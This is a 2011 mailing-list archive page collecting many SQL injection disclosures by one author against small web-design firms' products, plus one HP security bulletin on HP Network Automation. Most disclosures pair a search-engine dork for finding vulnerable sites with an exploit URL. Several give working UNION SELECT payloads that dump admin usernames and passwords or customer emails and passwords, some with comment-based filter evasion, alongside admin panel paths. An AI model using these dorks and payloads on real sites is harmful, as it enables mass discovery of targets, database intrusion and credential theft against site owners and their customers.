## Remote SQL injection Vulnerabilities
##
## Zones Web Solution (status.asp?print) (search_result.php?loc_id) 
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.zones.in/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Zones Web Solution inurl:status.asp?print=

Exploite:

www.victim.com/status.asp?print=1cno=[SQL]


Dork :  Powered by Zones Web Solution inurl:search_result.php?loc_id=

Exploite:

www.victim.com/search_result.php?loc_id=[SQL]

#
SpeCial TanX To : Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   


Avon Groups (search_result.php?cid) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Avon Groups (search_result.php?cid)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.avongroups.in/it/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered By: Avon Enterprises Pvt. Ltd.  inurl:search_result.php?cid='

Exploite:

www.victim.com/search_result.php?cid=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   

  


Web Fusion Nepal (find.php?id) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Web Fusion Nepal (find.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://webfusion.com.np/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Powered by: Web Fusion Nepal inurl:find.php?id=

Exploite:

www.victim.com/find.php?id=[SQL]

#
SpeCial TanX To : Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   
  


Infocus Web Solutions (news_desc.php?id) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Infocus Web Solutions (news_desc.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.infocuswebdesigning.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Infocus Web Solutions (P) Ltd. inurl:news_desc.php?id=

Exploite:

www.victim.com/news_desc.php?id=[SQL]

#
SpeCial TanX To : Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##




A1 Solutions (cat_sell.php?cid) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## A1 Solutions (cat_sell.php?cid)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.a1sols.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Powered by A1 Solutions inurl:cat_sell.php?cid=

Exploite:

www.victim.com/cat_sell.php?cid=-1 union select 
1,concat(user_name,0x3a,pass),1,1,1,1,1,1 from admin

#
SpeCial TanX To : Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##

 


indiacon (selloffers.php?cid) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## indiacon (selloffers.php?cid)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.indiacon.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : inurl:selloffers.php?cid=  Powered by indiacon.com

Exploite:

www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin

#
SpeCial TanX To : Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##

 


CobraScripts (selloffers.php?cid) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## CobraScripts (selloffers.php?cid)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://cobrascripts.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by CobraScripts inurl:cat_sell.php?cid=

Exploite:

www.victim.com/selloffers.php?cid=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


[security bulletin] HPSBMU02693 SSRT100583 rev.1 - HP Network Automation Running on Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS)

2011-07-28 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02942385
Version: 1

HPSBMU02693 SSRT100583 rev.1 - HP Network Automation Running on Linux, Solaris, 
and Windows, Remote SQL Injection, Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2011-07-28
Last Updated: 2011-07-28

Potential Security Impact: Remote SQL injection, cross site scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Network 
Automation running on Linux, Solaris, and Windows. The vulnerabilities could be 
exploited remotely resulting in SQL injection and cross site scripting (XSS).

References: CVE-2011-2402(XSS), CVE-2011-2403 (SQL injection)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Network Automation v7.2x, v7.5x, v7.6x, v9.0, v9.10

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-2402(AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
CVE-2011-2403(AV:N/AC:L/Au:S/C:C/I:C/A:C)   9.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided a patch to resolve the vulnerabilities for HP Network 
Automation v9.10. The patch is available here: 
http://support.openview.hp.com/selfsolve/patches

Upgrade to HP Network Automation v9.10
Apply patch 1 or subsequent (Title: Network Automation 09.10.01, Document ID: 
KM1207081)

HISTORY
Version:1 (rev.1) - 28 July 2011 Initial Release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental,special 
or consequential damages including downtime cost; lost profits;damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk4xdeMACgkQ4B86/C0qfVntSwCdF4drR9sS5wJ4+kFmIYfnv4NJ
7QcAn13pc8sXX/aSZf4FHCfx+7aFUpQw
=v+ei
-END PGP SIGNATURE-


Gopal Systems (products.php?cat_id) Remote SQL injection Vulnerability

2011-07-28 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Gopal Systems (products.php?cat_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.gopalsystems.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by: Gopal Systems. inurl:products.php?cat_id=

Exploite:

www.victim.com/products.php?cat_id=-1 union select 1,2,3,4 from tbladmin

#

Admin Panel :  www.victim.com/admin/

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


Agent Image (news_details.php?news_ID) Remote SQL injection Vulnerability

2011-07-27 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Agent Image (news_details.php?news_ID)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.agentimage.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Design by Agent Image inurl:news_details.php?news_ID=

Exploite:

www.victim.com/news_details.php?news_ID=[SQL]

###

Admin Panel: www.victim.com/admin/login.php

#
SpeCial TanX To : SaHand ShaBan , Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##

  


G2webCMS (products.php?cat_id) (member-profile.php?profile) Remote SQL injection Vulnerability

2011-07-27 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## G2webCMS (products.php?cat_id) (member-profile.php?profile)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.g2web.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by G2webCMS inurl:products.php?cat_id=

Exploite:

www.victim.com/store/products.php?cat_id=[SQL]


Dork : Powered by G2webCMS inurl:member-profile.php?profile=

Exploite:

www.victim.com/member-profile.php?profile=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


iCube Lab (product_details.php?cat_id) Remote SQL injection Vulnerability

2011-07-27 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## iCube Lab (product_details.php?cat_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.icubelab.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by   iCube Lab inurl:product_details.php?cat_id=

Exploite:

www.victim.com/product_details.php?cat_id=-1/**/union/**/select/**/Null,concat(email,0x3a,password),Null/**/from/**/user

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


Solutiontech (product.php?cat_id) Remote SQL injection Vulnerability

2011-07-27 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Solutiontech (product.php?cat_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.solutiontechindia.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered by Solutiontech inurl:product.php'

Exploite:

www.victim.com/product.php?cat_id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


Chrome Web Solutions (details.php?cat_id) (listing_more.php?id) Remote SQL injection Vulnerability

2011-07-27 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Chrome Web Solutions (details.php?cat_id) (listing_more.php?id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.chromewebsolutions.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Powered By : Chrome Web Solutions inurl:details.php?cat_id=

Exploite:

www.victim.com/details.php?cat_id=[SQL]


Dork : Powered By : Chrome Web Solutions inurl:listing_more.php?id=

Exploite:

www.victim.com/listing_more.php?id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##


Dow Group (dynamic.php?id) (sub.php?solutioncat_id) (news_desc.php?id) (product.php?id) Remote SQL injection Vulnerability

2011-07-27 Thread ehsan_hp200
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Dow Group (dynamic.php?id) (sub.php?solutioncat_id)  (news_desc.php?id)  
(product.php?id) 
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.dowgroup.com/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Designed by Dow Group inurl:dynamic.php?id=

Exploite:

www.victim.com/dynamic.php?id=[SQL]


Dork : Designed by Dow Group inurl:news_desc.php?id=

Exploite:

www.victim.com/news_desc.php?id=[SQL]


Dork : Designed by Dow Group product.php?id=

Exploite:

www.victim.com/product.php?id=[SQL]


Dork : Designed by Dow Group inurl:solutions.php?id=

Exploite:

www.victim.com/solutions.php?id=[SQL]


Dork : inurl:sub.php?solutioncat_id=

Exploite:

www.victim.com/sub.php?solutioncat_id=[SQL]

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##

  


Zones Web Solution (index.php?manufacturers_id) Remote SQL injection Vulnerability

2011-07-26 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Zones Web Solution (index.php?manufacturers_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.zones.in/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork :  Powered By : Zones Web Solution inurl:index.php?manufacturers_id='

Exploite:

www.victim.com/index.php?manufacturers_id=-1 union select 
concat(customers_email_address,0x3a,customers_password) from customers

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Funnel Web (items.php?cat_id) Remote SQL injection Vulnerability

2011-07-26 Thread ehsan_hp200
 ###  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Funnel Web (items.php?cat_id)
##   
###
###
###
###
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email: ehsan_hp...@hotmail.com
##  
## Vendor : http://www.funnel-web.com.au/
##  
## Persian Gulf 4 Ever!
#
#
#
#
#
##
##

Dork : Web site design by Funnel Web inurl:items.php

Exploite:

www.victim.com/items.php?cat_id=-1+Union+Select+1,concat(user_id,0x3a,user_pw),1+From+admin--

#
SpeCial TanX To :  Dj7Xpl
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##   
  


  1   2   3   >